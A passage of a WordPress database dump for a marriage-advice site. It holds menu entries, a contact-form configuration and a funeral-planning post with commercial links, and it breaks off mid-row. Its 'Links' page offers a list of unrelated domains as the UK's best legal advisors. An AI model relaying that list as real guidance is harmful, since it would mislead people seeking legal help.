10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','292','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=292',4,'nav_menu_item','',0),(293,1,'2017-10-04 10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','293','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=293',5,'nav_menu_item','',0),(294,1,'2017-10-04 10:23:32','2017-10-04 10:23:32','','69 of the worst Divorce Mistakes that you shouldn\'t make','','publish','closed','closed','','69-of-the-worst-divorce-mistakes-that-you-shouldnt-make','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=294',6,'nav_menu_item','',0),(295,1,'2017-10-04 10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','295','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=295',7,'nav_menu_item','',0),(296,1,'2017-10-04 10:23:32','2017-10-04 10:23:32',' ','','','publish','closed','closed','','296','','','2017-10-04 10:23:32','2017-10-04 10:23:32','',0,'http://www.bournesociety.org.uk/?p=296',8,'nav_menu_item','',0),(297,1,'2017-10-04 10:23:33','2017-10-04 10:23:33',' ','','','publish','closed','closed','','297','','','2017-10-04 10:23:33','2017-10-04 10:23:33','',0,'http://www.bournesociety.org.uk/?p=297',9,'nav_menu_item','',0),(298,1,'2017-10-04 10:23:33','2017-10-04 10:23:33',' ','','','publish','closed','closed','','298','','','2017-10-04 10:23:33','2017-10-04 10:23:33','',0,'http://www.bournesociety.org.uk/?p=298',10,'nav_menu_item','',0),(299,1,'2017-10-04 10:23:33','2017-10-04 10:23:33',' ','','','publish','closed','closed','','299','','','2017-10-04 10:23:33','2017-10-04 10:23:33','',0,'http://www.bournesociety.org.uk/?p=299',11,'nav_menu_item','',0),(300,1,'2017-10-04 10:23:33','2017-10-04 10:23:33',' ','','','publish','closed','closed','','300','','','2017-10-04 10:23:33','2017-10-04 10:23:33','',0,'http://www.bournesociety.org.uk/?p=300',12,'nav_menu_item','',0),(301,1,'2017-10-04 10:23:33','2017-10-04 10:23:33','','Co-dependent marriages – are they healthy?','','publish','closed','closed','','co-dependent-marriages-are-they-healthy','','','2017-10-04 10:23:33','2017-10-04 10:23:33','',0,'http://www.bournesociety.org.uk/?p=301',13,'nav_menu_item','',0),(302,1,'2017-10-04 10:23:34','2017-10-04 10:23:34',' ','','','publish','closed','closed','','302','','','2017-10-04 10:23:34','2017-10-04 10:23:34','',0,'http://www.bournesociety.org.uk/?p=302',14,'nav_menu_item','',0),(303,1,'2017-10-04 10:23:34','2017-10-04 10:23:34','','Did You Hear What I Just Said… How to Really Listen To Your Spouse –','','publish','closed','closed','','did-you-hear-what-i-just-said-how-to-really-listen-to-your-spouse','','','2017-10-04 10:23:34','2017-10-04 10:23:34','',0,'http://www.bournesociety.org.uk/?p=303',15,'nav_menu_item','',0),(304,1,'2017-10-04 10:23:34','2017-10-04 10:23:34','','Divorce and Children – Avoiding Divorce Problems','','publish','closed','closed','','divorce-and-children-avoiding-divorce-problems','','','2017-10-04 10:23:34','2017-10-04 10:23:34','',0,'http://www.bournesociety.org.uk/?p=304',16,'nav_menu_item','',0),(305,1,'2017-10-04 10:23:34','2017-10-04 10:23:34',' ','','','publish','closed','closed','','305','','','2017-10-04 10:23:34','2017-10-04 10:23:34','',0,'http://www.bournesociety.org.uk/?p=305',17,'nav_menu_item','',0),(306,1,'2017-10-04 10:23:34','2017-10-04 10:23:34',' ','','','publish','closed','closed','','306','','','2017-10-04 10:23:34','2017-10-04 10:23:34','',0,'http://www.bournesociety.org.uk/?p=306',18,'nav_menu_item','',0),(307,1,'2017-10-04 10:23:35','2017-10-04 10:23:35',' ','','','publish','closed','closed','','307','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=307',19,'nav_menu_item','',0),(308,1,'2017-10-04 10:23:35','2017-10-04 10:23:35','','Help to stop your divorce and save your marriage. –','','publish','closed','closed','','help-to-stop-your-divorce-and-save-your-marriage','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=308',20,'nav_menu_item','',0),(309,1,'2017-10-04 10:23:35','2017-10-04 10:23:35','','Here\'s how to find out if your wife/husband is cheating','','publish','closed','closed','','heres-how-to-find-out-if-your-wifehusband-is-cheating','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=309',21,'nav_menu_item','',0),(310,1,'2017-10-04 10:23:35','2017-10-04 10:23:35',' ','','','publish','closed','closed','','310','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=310',22,'nav_menu_item','',0),(311,1,'2017-10-04 10:23:35','2017-10-04 10:23:35',' ','','','publish','closed','closed','','311','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=311',23,'nav_menu_item','',0),(312,1,'2017-10-04 10:23:35','2017-10-04 10:23:35',' ','','','publish','closed','closed','','312','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=312',24,'nav_menu_item','',0),(313,1,'2017-10-04 10:23:35','2017-10-04 10:23:35',' ','','','publish','closed','closed','','313','','','2017-10-04 10:23:35','2017-10-04 10:23:35','',0,'http://www.bournesociety.org.uk/?p=313',25,'nav_menu_item','',0),(314,1,'2017-10-04 10:23:36','2017-10-04 10:23:36',' ','','','publish','closed','closed','','314','','','2017-10-04 10:23:36','2017-10-04 10:23:36','',0,'http://www.bournesociety.org.uk/?p=314',26,'nav_menu_item','',0),(315,1,'2017-10-04 10:23:36','2017-10-04 10:23:36','','It\'s no secret that money problems can pull your marriage apart','','publish','closed','closed','','its-no-secret-that-money-problems-can-pull-your-marriage-apart','','','2017-10-04 10:23:36','2017-10-04 10:23:36','',0,'http://www.bournesociety.org.uk/?p=315',27,'nav_menu_item','',0),(316,1,'2017-10-04 10:23:36','2017-10-04 10:23:36','','Marriage – is it A Financial Liability?','','publish','closed','closed','','marriage-is-it-a-financial-liability','','','2017-10-04 10:23:36','2017-10-04 10:23:36','',0,'http://www.bournesociety.org.uk/?p=316',28,'nav_menu_item','',0),(317,1,'2017-10-04 10:23:36','2017-10-04 10:23:36',' ','','','publish','closed','closed','','317','','','2017-10-04 10:23:36','2017-10-04 10:23:36','',0,'http://www.bournesociety.org.uk/?p=317',29,'nav_menu_item','',0),(318,1,'2017-10-04 10:23:37','2017-10-04 10:23:37',' ','','','publish','closed','closed','','318','','','2017-10-04 10:23:37','2017-10-04 10:23:37','',0,'http://www.bournesociety.org.uk/?p=318',30,'nav_menu_item','',0),(319,1,'2017-10-04 10:23:37','2017-10-04 10:23:37',' ','','','publish','closed','closed','','319','','','2017-10-04 10:23:37','2017-10-04 10:23:37','',0,'http://www.bournesociety.org.uk/?p=319',31,'nav_menu_item','',0),(320,1,'2017-10-04 10:23:37','2017-10-04 10:23:37',' ','','','publish','closed','closed','','320','','','2017-10-04 10:23:37','2017-10-04 10:23:37','',0,'http://www.bournesociety.org.uk/?p=320',32,'nav_menu_item','',0),(321,1,'2017-10-04 10:23:37','2017-10-04 10:23:37',' ','','','publish','closed','closed','','321','','','2017-10-04 10:23:37','2017-10-04 10:23:37','',0,'http://www.bournesociety.org.uk/?p=321',33,'nav_menu_item','',0),(322,1,'2017-10-04 10:23:37','2017-10-04 10:23:37',' ','','','publish','closed','closed','','322','','','2017-10-04 10:23:37','2017-10-04 10:23:37','',0,'http://www.bournesociety.org.uk/?p=322',34,'nav_menu_item','',0),(323,1,'2017-10-04 10:24:37','2017-10-04 10:24:37','<label> Your Name (required)\r\n    [text* your-name] </label>\r\n\r\n<label> Your Email (required)\r\n    [email* your-email] </label>\r\n\r\n<label> Subject\r\n    [text your-subject] </label>\r\n\r\n<label> Your Message\r\n    [textarea your-message] </label>\r\n\r\n[submit \"Send\"]\n1\nBourne Society \"[your-subject]\"\n[your-name] <wordpress@bournesociety.org.uk>\nleads@vanillacircus.co.uk\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on Bourne Society (http://www.bournesociety.org.uk)\nReply-To: [your-email]\n\n\n\n\nBourne Society \"[your-subject]\"\nBourne Society <wordpress@bournesociety.org.uk>\n[your-email]\nMessage Body:\r\n[your-message]\r\n\r\n-- \r\nThis e-mail was sent from a contact form on Bourne Society (http://www.bournesociety.org.uk)\nReply-To: amber.platts@vanillacircus.co.uk\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2017-10-04 10:24:51','2017-10-04 10:24:51','',0,'http://www.bournesociety.org.uk/?post_type=wpcf7_contact_form&#038;p=323',0,'wpcf7_contact_form','',0),(327,1,'2017-10-04 10:26:45','2017-10-04 10:26:45','','Control Issues','','publish','closed','closed','','control-issues','','','2017-10-04 10:26:45','2017-10-04 10:26:45','',0,'http://www.bournesociety.org.uk/control-issues',1,'nav_menu_item','',0),(328,1,'2017-10-04 10:26:46','2017-10-04 10:26:46','','Communication Problems','','publish','closed','closed','','communication-problems','','','2017-10-04 10:26:46','2017-10-04 10:26:46','',0,'http://www.bournesociety.org.uk/communication-problems',2,'nav_menu_item','',0),(329,1,'2017-10-04 10:26:46','2017-10-04 10:26:46','','Divorce','','publish','closed','closed','','divorce','','','2017-10-04 10:26:46','2017-10-04 10:26:46','',0,'http://www.bournesociety.org.uk/divorce',5,'nav_menu_item','',0),(330,1,'2017-10-04 10:26:46','2017-10-04 10:26:46',' ','','','publish','closed','closed','','330','','','2017-10-04 10:26:46','2017-10-04 10:26:46','',0,'http://www.bournesociety.org.uk/330',3,'nav_menu_item','',0),(331,1,'2017-10-04 10:26:47','2017-10-04 10:26:47','','Co-dependent','','publish','closed','closed','','co-dependent','','','2017-10-04 10:26:47','2017-10-04 10:26:47','',0,'http://www.bournesociety.org.uk/co-dependent',6,'nav_menu_item','',0),(332,1,'2017-10-04 10:26:47','2017-10-04 10:26:47',' ','','','publish','closed','closed','','332','','','2017-10-04 10:26:47','2017-10-04 10:26:47','',0,'http://www.bournesociety.org.uk/332',4,'nav_menu_item','',0),(333,1,'2017-10-04 10:26:48','2017-10-04 10:26:48','','Cheating Spouses','','publish','closed','closed','','cheating-spouses','','','2017-10-04 10:26:48','2017-10-04 10:26:48','',0,'http://www.bournesociety.org.uk/cheating-spouses',7,'nav_menu_item','',0),(334,1,'2017-10-04 10:27:05','2017-10-04 10:27:05','Do you need some expert legal advice regarding your marriage? Click on one of the links to see the best advisors in the UK.\r\n\r\n&nbsp;\r\n<table width=\"233\">\r\n<tbody>\r\n<tr>\r\n<td width=\"233\"><a href=\"http://www.socialcohesion.uk/\">socialcohesion.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://directgov.co.uk%20\">directgov.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lbro.org.uk\">lbro.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://mackesyscrime.co.uk\">mackesyscrime.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://christiankhan.co.uk%20\">christiankhan.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lawspeak.co.uk\">lawspeak.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://gov-certificates.co.uk%20\">gov-certificates.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://legal-medical.co.uk\">legal-medical.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://clc2015.co.uk\">clc2015.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://birminghamlawcentre.org.uk/\">birminghamlawcentre.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://roadsidelawyer.co.uk%20\">roadsidelawyer.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lancsresilience.org.uk\">lancsresilience.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://www.ashfordbestplaced.co.uk/\">ashfordbestplaced.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://officeforlegalcomplaints.org.uk%20\">officeforlegalcomplaints.org.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://daviddavies.co.uk%20\">daviddavies.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://liddingtons.co.uk\">liddingtons.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://dcpa.co.uk%20\">dcpa.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lawindexpro.co.uk\">lawindexpro.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://accidents-direct.co.uk\">accidents-direct.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://globalxchange.org.uk\">globalxchange.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://smallclaims.me.uk\">smallclaims.me.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://dyfedpowyspoliceauthority.co.uk\">dyfedpowyspoliceauthority.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://googlelawsuit.co.uk%20\">googlelawsuit.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://balforlegal.co.uk\">balforlegal.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lbsafetycameras.co.uk\">lbsafetycameras.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://privycouncil.org.uk%20\">privycouncil.org.uk </a></td>\r\n</tr>\r\n</tbody>\r\n</table>','Links','','publish','closed','closed','','links','','','2017-10-04 10:29:05','2017-10-04 10:29:05','',0,'http://www.bournesociety.org.uk/?page_id=334',0,'page','',0),(335,1,'2017-10-04 10:27:05','2017-10-04 10:27:05',' ','','','publish','closed','closed','','335','','','2017-10-04 10:27:05','2017-10-04 10:27:05','',0,'http://www.bournesociety.org.uk/335',8,'nav_menu_item','',0),(336,1,'2017-10-04 10:27:05','2017-10-04 10:27:05','','Links','','inherit','closed','closed','','334-revision-v1','','','2017-10-04 10:27:05','2017-10-04 10:27:05','',334,'http://www.bournesociety.org.uk/334-revision-v1',0,'revision','',0),(337,1,'2017-10-04 10:28:07','2017-10-04 10:28:07','Do you need some expert legal advice regarding your marriage? Click on one of the links to see the best advisors in the UK.\n\n&nbsp;\n<table width=\"233\">\n<tbody>\n<tr>\n<td width=\"233\">socialcohesion.uk</td>\n</tr>\n<tr>\n<td><a href=\"http://directgov.co.uk%20\">directgov.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://lbro.org.uk\">lbro.org.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://mackesyscrime.co.uk\">mackesyscrime.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://christiankhan.co.uk%20\">christiankhan.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://lawspeak.co.uk\">lawspeak.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://gov-certificates.co.uk%20\">gov-certificates.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://legal-medical.co.uk\">legal-medical.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://clc2015.co.uk\">clc2015.co.uk</a></td>\n</tr>\n<tr>\n<td>birminghamlawcentre.org.uk</td>\n</tr>\n<tr>\n<td><a href=\"http://roadsidelawyer.co.uk%20\">roadsidelawyer.co.uk </a></td>\n</tr>\n<tr>\n<td>lancsresilience.org.uk</td>\n</tr>\n<tr>\n<td>ashfordbestplaced.co.uk</td>\n</tr>\n<tr>\n<td><a href=\"http://officeforlegalcomplaints.org.uk%20\">officeforlegalcomplaints.org.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://daviddavies.co.uk%20\">daviddavies.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://liddingtons.co.uk\">liddingtons.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://dcpa.co.uk%20\">dcpa.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://lawindexpro.co.uk\">lawindexpro.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://accidents-direct.co.uk\">accidents-direct.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://globalxchange.org.uk\">globalxchange.org.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://smallclaims.me.uk\">smallclaims.me.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://dyfedpowyspoliceauthority.co.uk\">dyfedpowyspoliceauthority.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://googlelawsuit.co.uk%20\">googlelawsuit.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://balforlegal.co.uk\">balforlegal.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://lbsafetycameras.co.uk\">lbsafetycameras.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://privycouncil.org.uk%20\">privycouncil.org.uk </a></td>\n</tr>\n</tbody>\n</table>','Links','','inherit','closed','closed','','334-autosave-v1','','','2017-10-04 10:28:07','2017-10-04 10:28:07','',334,'http://www.bournesociety.org.uk/334-autosave-v1',0,'revision','',0),(338,1,'2017-10-04 10:29:05','2017-10-04 10:29:05','Do you need some expert legal advice regarding your marriage? Click on one of the links to see the best advisors in the UK.\r\n\r\n&nbsp;\r\n<table width=\"233\">\r\n<tbody>\r\n<tr>\r\n<td width=\"233\"><a href=\"http://www.socialcohesion.uk/\">socialcohesion.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://directgov.co.uk%20\">directgov.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lbro.org.uk\">lbro.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://mackesyscrime.co.uk\">mackesyscrime.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://christiankhan.co.uk%20\">christiankhan.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lawspeak.co.uk\">lawspeak.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://gov-certificates.co.uk%20\">gov-certificates.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://legal-medical.co.uk\">legal-medical.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://clc2015.co.uk\">clc2015.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://birminghamlawcentre.org.uk/\">birminghamlawcentre.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://roadsidelawyer.co.uk%20\">roadsidelawyer.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lancsresilience.org.uk\">lancsresilience.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://www.ashfordbestplaced.co.uk/\">ashfordbestplaced.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://officeforlegalcomplaints.org.uk%20\">officeforlegalcomplaints.org.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://daviddavies.co.uk%20\">daviddavies.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://liddingtons.co.uk\">liddingtons.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://dcpa.co.uk%20\">dcpa.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lawindexpro.co.uk\">lawindexpro.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://accidents-direct.co.uk\">accidents-direct.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://globalxchange.org.uk\">globalxchange.org.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://smallclaims.me.uk\">smallclaims.me.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://dyfedpowyspoliceauthority.co.uk\">dyfedpowyspoliceauthority.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://googlelawsuit.co.uk%20\">googlelawsuit.co.uk </a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://balforlegal.co.uk\">balforlegal.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://lbsafetycameras.co.uk\">lbsafetycameras.co.uk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://privycouncil.org.uk%20\">privycouncil.org.uk </a></td>\r\n</tr>\r\n</tbody>\r\n</table>','Links','','inherit','closed','closed','','334-revision-v1','','','2017-10-04 10:29:05','2017-10-04 10:29:05','',334,'http://www.bournesociety.org.uk/334-revision-v1',0,'revision','',0),(339,1,'2017-10-04 10:29:19','2017-10-04 10:29:19','[contact-form-7 id=\"323\" title=\"Contact form 1\"]','Contact','','publish','closed','closed','','contact','','','2017-10-04 10:29:19','2017-10-04 10:29:19','',0,'http://www.bournesociety.org.uk/?page_id=339',0,'page','',0),(340,1,'2017-10-04 10:29:19','2017-10-04 10:29:19',' ','','','publish','closed','closed','','340','','','2017-10-04 10:29:19','2017-10-04 10:29:19','',0,'http://www.bournesociety.org.uk/340',9,'nav_menu_item','',0),(341,1,'2017-10-04 10:29:19','2017-10-04 10:29:19','[contact-form-7 id=\"323\" title=\"Contact form 1\"]','Contact','','inherit','closed','closed','','339-revision-v1','','','2017-10-04 10:29:19','2017-10-04 10:29:19','',339,'http://www.bournesociety.org.uk/339-revision-v1',0,'revision','',0),(343,1,'2017-10-04 10:29:33','2017-10-04 10:29:33',' ','','','publish','closed','closed','','343','','','2017-10-04 10:29:33','2017-10-04 10:29:33','',0,'http://www.bournesociety.org.uk/343',8,'nav_menu_item','',0),(344,1,'2017-10-04 10:29:34','2017-10-04 10:29:34',' ','','','publish','closed','closed','','344','','','2017-10-04 10:29:34','2017-10-04 10:29:34','',0,'http://www.bournesociety.org.uk/344',9,'nav_menu_item','',0),(346,1,'2018-05-10 14:09:29','2018-05-10 14:09:29','<h2>Difference between a Funeral and Memorial Services</h2>\r\nMaking funeral arrangements for a perished loved ones, or pre-planning your own funeral or memorial service can be a confusing and overwhelming task, that\'s why it is important to research <a href=\"https://www.prosperous-life.co.uk/2021/01/19/choosing-the-right-funeral-planning-company/\">funeral planning companies</a> before you choose one so you know you will be happy with the result. When making funeral arrangements, one of the first questions you should ask yourself is what type of service is preferred. It is important that you tell your guests whether you are holding a funeral or a memorial service.\r\n\r\nPlease <a href=\"http://www.bournesociety.org.uk/contact\">contact Bourne Advice</a> for information regarding funeral planning.\r\n<h2><a href=\"https://www.write-out-loud.com/eulogy-write.html\" target=\"_blank\" rel=\"noopener\">The Eulogy. The most important part of a funeral</a></h2>\r\nEulogy is a speech at a funeral service to recollect the life and achievements of the perished. The best eulogies come from the heart and are written and delivered by someone close to the perished, so it does not need perfect sentence structure or grammar to be a good eulogy.\r\n<h2>Make Funeral Arrangements Early to avoid Problems</h2>\r\n<em>Pre-arranged funeral plans have become popular.</em> This will let you to pre-arrange your funeral so that the burden of making lots of decisions will not rest upon your relatives when you are gone. It is also a way for you to be able to control or select among the options that would otherwise be available to your family and friends. This can be things like the guests, the music, looking at <a href=\"https://discount-caskets.com/\">caskets</a>, anything that you would consider difficult for your family and friends to go through.\r\n\r\nPlanning your funeral in advance takes the heavy burden off of your loved ones, making the grieving period that slight bit easier. The first and most important thing to do before planning your funeral is to write your will. Allocate what belongs to everybody and make a will so that future wars aren\'t dependent on this. If you\'re unsure about whom to consult with regards to this crucial decision, you might want to look into firms like <a href=\"https://www.paramountwills.co.uk/\">wills colchester</a> and other similar companies.\r\n\r\nYou may be surprised to learn that there are so many components that make up the funeral planning process. From the type of service that you want to the songs and hymns you would like, and even choosing <a href=\"https://pattenmonument.com/\">gravestones</a> and what you want to be written on it are all aspects that are just as important as the rest. And if you have clear thoughts about what you would like, you can make a plan for it now so your loved ones don\'t have to, and this way, you can make sure that you have everything you have asked for. \r\n\r\nSo with that being said, there are many funeral directors in your local area that can help towards creating the ideal plan for you. <a href=\"https://www.funeralguide.co.uk/\" target=\"_blank\" rel=\"noopener\">Click here</a> for more information on creating your funeral plan.\r\n\r\n<strong>There are a host of benefits that comes with planning your own funeral, including:</strong>\r\n<ul>\r\n 	<li>Peace of mind: the burden on your family has lessened during such a difficult time</li>\r\n 	<li>Plan for you: you can plan how you want your loved ones to remember you with music & themes</li>\r\n 	<li>Keep costs low: you can avoid the rising costs of funeral due to inflation. Pay for your funeral at today\'s prices</li>\r\n 	<li>Payment plan: choose how you want to pay - monthly instalments or pay outright</li>\r\n</ul>\r\nRead More: <a href=\"https://www.telegraph.co.uk/financial-services/retirement-solutions/funeral-plans/comparing-funeral-plans/\" target=\"_blank\" rel=\"noopener\">How to compare funeral plans</a>','The importance of funeral planning','','publish','closed','closed','','the-importance-of-funeral-planning','','','2018-05-10 14:16:00','2018-05-10 14:16:00','',0,'http://www.bournesociety.org.uk/?p=346',0,'post','',0),(347,1,'2018-05-10 14:08:52','2018-05-10 14:08:52','','graveyard','','inherit','closed','closed','','graveyard','','','2018-05-10 14:09:27','2018-05-10 14:09:27','',346,'http://www.bournesociety.org.uk/wp-content/uploads/2018/05/graveyard.jpg',0,'attachment','image/jpeg',0),(348,1,'2018-05-10 14:09:29','2018-05-10 14:09:29','<h2>Difference between a Funeral and Memorial Services</h2>\r\nMaking funeral arrangements for a perished loved ones, or pre-planning your own funeral or memorial service can be a confusing and overwhelming task. When making funeral arrangements, one of the first questions you should ask yourself is what type of service is preferred. It is important that you tell your guests whether you are holding a funeral or a memorial service.\r\n<h2>The Eulogy. The most important part of a funeral</h2>\r\nEulogy is a speech at a funeral service to recollect the life and achievements of the perished. The best eulogies come from the heart and are written and delivered by someone close to the perished, so it does not need perfect sentence structure or grammar to be a good eulogy.\r\n<h2>Make Funeral Arrangements Early to avoid Problems</h2>\r\n<em>Pre-arranged funeral plans have become popular.</em> This will let you to pre-arrange your funeral so that the burden of making lots of decisions will not rest upon your relatives when you are gone. It is also a way for you to be able to control or select among the options that would otherwise be available to your family and friends.\r\n\r\nPlanning your funeral in advance takes the heavy burden off of your loved ones, making the grieving period that slight bit easier.\r\n\r\nThere are many funeral directors in your local area that can help towards creating the ideal plan for you. <a href=\"https://www.funeralguide.co.uk/\" target=\"_blank\" rel=\"noopener\">Click here</a> for more information on creating your funeral plan.\r\n\r\n<strong>There are a host of benefits that comes with planning your own funeral, including:</strong>\r\n<ul>\r\n 	<li>Peace of mind: the burden on your family has lessened during such a difficult time</li>\r\n 	<li>Plan for you: you can plan how you want your loved ones to remember you with music &amp; themes</li>\r\n 	<li>Keep costs low: you can avoid the rising costs of funeral due to inflation. Pay for your funeral at today\'s prices</li>\r\n 	<li>Payment plan: choose how you want to pay - monthly instalments or pay outright</li>\r\n</ul>','The importance of funeral planning','','inherit','closed','closed','','346-revision-v1','','','2018-05-10 14:09:29','2018-05-10 14:09:29','',346,'http://www.bournesociety.org.uk/346-revision-v1',0,'revision','',0),(349,1,'2018-05-10 14:14:17','2018-05-10 14:14:17','<h2>Difference between a Funeral and Memorial Services</h2>\r\nMaking funeral arrangements for a perished loved ones, or pre-planning your own funeral or memorial service can be a confusing and overwhelming task. When making funeral arrangements, one of the first questions you should ask yourself is what type of service is preferred. It is important that you tell your guests whether you are holding a funeral or a memorial service.\r\n<h2>The Eulogy. The most important part of a funeral</h2>\r\nEulogy is a speech at a funeral service to recollect the life and achievements of the perished. The best eulogies come from the heart and are written and delivered by someone close to the perished, so it does not need perfect sentence structure or grammar to be a good eulogy.\r\n<h2>Make Funeral Arrangements Early to avoid Problems</h2>\r\n<em>Pre-arranged funeral plans have become popular.</em> This will let you to pre-arrange your funeral so that the burden of making lots of decisions will not rest upon your relatives when you are gone. It is also a way for you to be able to control or select among the options that would otherwise be available to your family and friends.\r\n\r\nPlanning your funeral in advance takes the heavy burden off of your loved ones, making the grieving period that slight bit easier.\r\n\r\nThere are many funeral directors in your local area that can help towards creating the ideal plan for you. <a href=\"https://www.funeralguide.co.uk/\" target=\"_blank\" rel=\"noopener\">Click here</a> for more information on creating your funeral plan.\r\n\r\n<strong>There are a host of benefits that comes with planning your own funeral, including:</strong>\r\n<ul>\r\n 	<li>Peace of mind: the burden on your family has lessened during such a difficult time</li>\r\n 	<li>Plan for you: you can plan how you want your loved ones to remember you with music &amp; themes</li>\r\n 	<li>Keep costs low: you can avoid the rising costs of funeral due to inflation. Pay for your funeral at today\'s prices</li>\r\n 	<li>Payment plan: choose how you want to pay - monthly instalments or pay outright</li>\r\n</ul>\r\nRead More: <a 